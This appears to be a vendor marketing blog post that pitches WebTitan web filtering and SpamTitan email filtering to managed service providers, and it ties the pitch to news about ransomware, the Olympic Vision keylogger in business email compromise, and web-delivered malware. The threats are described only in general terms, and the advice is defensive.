What businesses need to do is to make sure they are better protected to prevent Bitcoin ransomware from being installed and to ensure they have viable backups in case ransomware does get installed on their networks.
There are a number of ways for managed service providers to increase cash flow and boost profits. Efficiency can be improved, staff productivity can be increased, better margins achieved, and new in-house products could be developed. Unfortunately, all of these are easier said than done.
The main ways to increase profits by a significant amount is to attract new customers and increase the amount each existing client is spending.
If only there was a secret ingredient that MSPs are missing that could help them win more business and get each client to spend more! The good news is that for many MSPs, there is such a product.
Any MSP that has yet to include a web filtering service into their product portfolio could be missing out on substantial profits.
Web Filtering – An Easy Way for MSPs to Increase Profits
Filtering the Internet is now essential for many enterprises. In certain industries it is mandatory for companies to filter the Internet. They need to ensure sensitive data are protected and risk is effectively managed. Networks must be protected from attacks by hackers, and with an increasing number of web-borne threats, Internet usage policies alone are not sufficient to keep organizations protected. Those policies need to be enforced, and a web filter is the natural choice.
In some industries, education for example, it is mandatory for the Internet to be filtered. Minors must be prevented from accessing obscene website content or other material that could be harmful. Even when it is not mandatory to filter the Internet it is often desirable. Hotels, restaurants, transport networks, airports, cafes, and coffee shops are choosing to implement controls to ensure all users enjoy a safe browsing experience.
In business, productivity losses from Internet abuse can be considerable. If every employee wasted an hour each day on personal Internet use, the losses to a medium-sized company would be substantial. Some studies suggest even more time is wasted by employees each day on non-work related Internet activities.
Failure to filter the Internet can prove costly in many ways. For example, the accessing of adult content in the workplace can lead to the development of a hostile working environment, which affects morale, productivity, and can cause all manner of HR headaches. The use of torrent sites and the downloading of pirated films, music, TV shows, and software can cause organizations legal headaches as well as placing pressure on bandwidth.
Many websites are unsafe and accessing those sites places organizations at a greater risk of a malware infection. A single compromised computer can cause an incredible amount of damage. The latest ransomware attack on Medstar Health is a good example. A computer virus was inadvertently downloaded which resulted in the shutdown of the health system’s email for its entire workforce, as well as its electronic medical record system.
Hollywood Presbyterian Medical Center was attacked with ransomware and had to pay $17,000 to obtain security keys to unlock its data. It is not only healthcare organizations that are having to deal with ransomware. U.S. police departments have been forced to pay attackers after their computers have been locked by file-encrypting software, and many organizations have fallen victim to ransomware, keyloggers, viruses, and other malicious software. These infections are a drain on productivity and take a considerable amount of time and resources to fix.
A web filtering solution can protect against web-borne threats, can be used to tackle productivity losses, and can prevent illegal or unsuitable website content from being accessed. Web filtering is now less of an option for many businesses and more of a requirement. MSPs offering such a service can find it is an easy sell and a great way to boost profits.
What to Look for in a Web Filtering Product
In order for a third-party product to be included in an MSP’s existing portfolio it should have a number of features. MSPs therefore need to find a web filtering product that:
- Has generous margins
- Is easy for sales teams to sell to clients
- Has a low management overhead
- Is easy to install
- Appeals to a wide range of clients
- Can be easily incorporated into existing product offerings
- Can be easily incorporated into back-office systems
There is a product that ticks all of these boxes, and that is WebTitan Cloud.
WebTitan Cloud and WebTitan Cloud for WiFi – Ideal Web Filtering Solutions for MSPs
WebTitan Cloud is a 100% cloud-based DNS filtering solution that has been designed to be easy to implement, maintain, manage, and sell to clients. WebTitan Cloud is a no-brainer for many organizations, allowing thousands of dollars to be saved.
WebTitan Cloud can help organizations increase productivity of the workforce, improve security posture to prevent malware infections, and highly competitive pricing means considerable savings can be made by organizations looking to switch web filtering providers.
WebTitan can be implemented without any effect on Internet speed; there is no need for any additional hardware and no software downloads are required. Our product is easy to use, and management is straightforward and not labor-intensive.
Key Features and Benefits of WebTitan Cloud that will Appeal to MSPs
WebTitan Cloud and WebTitan Cloud for WiFi have been developed to be appealing to MSPs and their clients. To make it as easy as possible for our web filtering solutions to be incorporated into existing client packages and allow MSPs to boost profits, we offer the following:
- White labelling – Allows MSPs to add their own branding and color schemes.
- Hosting choices – We can host on our servers, provide private cloud hosting, or you can run our solution within your own infrastructure.
- Generous margins for MSPs and highly competitive pricing – An easy way to boost profits.
- Usage-based monthly billing – Makes WebTitan Cloud more affordable for clients.
- Flexible pricing – Our product can easily be included in your pricing models.
- Multi-tenanted solution – Advanced customer management features make it easy to add new clients.
- API-driven – Easy integration into back-end billing and reporting systems.
- Highly scalable – Our web filtering solution is suitable for businesses of all sizes.
- Excellent support – Industry leading customer service and technical support. If you have a problem, it will be rapidly resolved.
To find out more about how easy it is to incorporate WebTitan Cloud into your existing portfolio and boost profits, contact our sales team today.
Web-borne attacks on enterprises are increasing, although it is important not to forget to protect against email attacks, as shown by a recent campaign using the Olympic Vision keylogger.
Olympic Vision Keylogger Used in Recent Business Email Compromise Attacks
The attackers behind the latest campaign are using the Olympic Vision keylogger to gain access to business email accounts. Trend Micro discovered the latest campaign and was able to trace the attacks and link them to two Nigerian cybercriminals. Trend Micro determined that the current campaign has been conducted in 18 different countries including the United States.
Business email accounts contain a wealth of data which, in the wrong hands, could result in considerable damage being caused to an enterprise. However, it is not only data stored in the email accounts that hackers want to obtain. The cybercriminal gang behind the latest attacks has a different purpose. Attacks are being conducted to gain access to business email accounts and use them to send emails to accounts department employees instructing them to make bank transfers to the attackers’ accounts. Large transfers are often made following a business email compromise (BEC) attack.
If hackers can gain access to the email account of a senior executive, they can use that account to send messages to members of staff in the accounts or billing departments requesting transfers be made to their bank accounts. BEC is a highly effective attack strategy. If an email is sent from a CEO to the accounts department requesting an urgent transfer be made, many employees would not think twice before making the transfer as instructed.
This social engineering technique takes advantage of the fact that many employees would not question a direct request from a CEO or senior account executive. A transfer is made and the attacker receives the funds, withdraws the money, and closes the account. This often occurs before any red flags are raised, even when the transfer is for tens or hundreds of thousands of dollars.
Sophisticated Attacks Being Conducted Using Unsophisticated Malware
The Olympic Vision keylogger is not a sophisticated malware. Once installed on a device it will steal information including the computer name, Windows product keys, keystrokes, network information, clipboard text, and data saved in browsers, messaging clients, FTP clients, and email clients. It is also capable of taking screenshots.
Those data are then encrypted and sent via email, FTP, or other means to the attacker. The Olympic Vision keylogger is capable of displaying fake error messages, and can disable computer functions to evade detection; Task Manager, for example, can be blocked, as can registry editing tools. The Olympic Vision keylogger is capable of terminating programs that may detect it, and uses anti-emulation to prevent it running in a sandbox.
With the information collected, attackers are not only able to gain access to business email accounts, they can search for other computers, study workflows, and gather intelligence. The intel is used to construct convincing emails and ensure they are sent to individuals in the accounts department authorized to make bank transfers.
The attacks can be incredibly lucrative. The FBI reported recently that BEC attacks have been used by cybercriminals to obtain around $800 million from businesses in the past year.
How to Protect Against BEC Attacks
There are a number of strategies that can be used to prevent BEC attacks from taking place. Software solutions can be used to prevent malware such as the Olympic Vision keylogger from being installed. SpamTitan spam filtering software can be used to block emails containing malicious attachments to prevent them from being sent to end users. If malicious emails are blocked, this places less reliance on end users not to open infected email attachments. SpamTitan can also block phishing emails, which are also used to gain access to login credentials via links to malicious websites.
Staff training is also essential. End users should receive basic security training and be advised of best practices to adopt to reduce risk. With software solutions and a culture of security awareness, the majority of attacks can be prevented.
However, it is also essential to introduce policies and procedures to prevent fraudulent bank transfers being made. A wise precaution is to introduce policies that require bank transfer requests to be authorized by a supervisor. This additional control can help to ensure fraudulent transfer requests are identified.
Any atypical request for a transfer from a senior account executive, especially those that require large sums to be transferred to accounts not previously used by the company, should be verified with the person who made the request prior to the transfer being made.
Cybercriminals are moving away from email attacks and are concentrating on web-based exploits to deliver malware. Email remains a major source of malware, but web-based attacks are now much more prevalent.
Web-Based Exploits Increasingly Used to Deliver Malware
A recent report from Palo Alto Networks showed that out of just over 68,000 malware samples collected, 25% were delivered via email, whereas 68% were delivered during web-browsing. Those figures were for known malware. When it comes to undetected samples, the figures for web-browsing rose to 90% compared to just 2% delivered via email. Undetected malware samples are those which are not detected by traditional anti-malware and anti-virus solutions.
It is easy to see why web-based exploits are being favored by cybercriminals. It takes much longer for web-based exploits to be detected by anti-virus software than email-based attacks. Palo Alto reports that it takes four times as long to detect web-based exploits as it does email-based attacks. Attackers are also able to tweak web-based malware in real-time. Email-based malware needs to be sent out and changes can only be made for each new campaign.
In the case of email-based malware attacks, the malicious software is relatively easy for AV companies to detect. They are able to give each malware sample a signature, which makes it much easier to block attacks. In the case of web-based malware this is a much harder task. The malware can be tweaked in real-time, making it harder for AV companies to capture it and create a signature. A web server on which malware is hosted can be configured to re-code the malware automatically and generate many thousands of unique malware variants. Capturing each sample and adding a signature for it takes too long.
There are many methods that can be employed to reduce the risk of malware infections from web browsing, although one of the easiest preventative steps to take is to use a web filtering solution such as WebTitan. WebTitan allows organizations to carefully control the websites that can be accessed by end users.
Palo Alto reported that HTTP proxies were frequently used in malware delivery. The blocking of HTTP proxies and web anonymizers can help to improve security posture and reduce the risk of malware downloads. P2P networks are also commonly used to deliver malware, and these can also be easily blocked with WebTitan web filtering solutions.
Social media websites are a common source of malware infections. A recent survey conducted by the Ponemon Institute revealed that 18% of respondents had experienced a malware attack via social media websites. Blocking access to social media networks, or blocking the file-transfer function of Facebook for example, can help to reduce the risk of malware downloads.
The threat landscape is constantly changing; however, by carefully controlling the actions that can be performed by end users with a web filter, the risk of malware infections can be greatly reduced.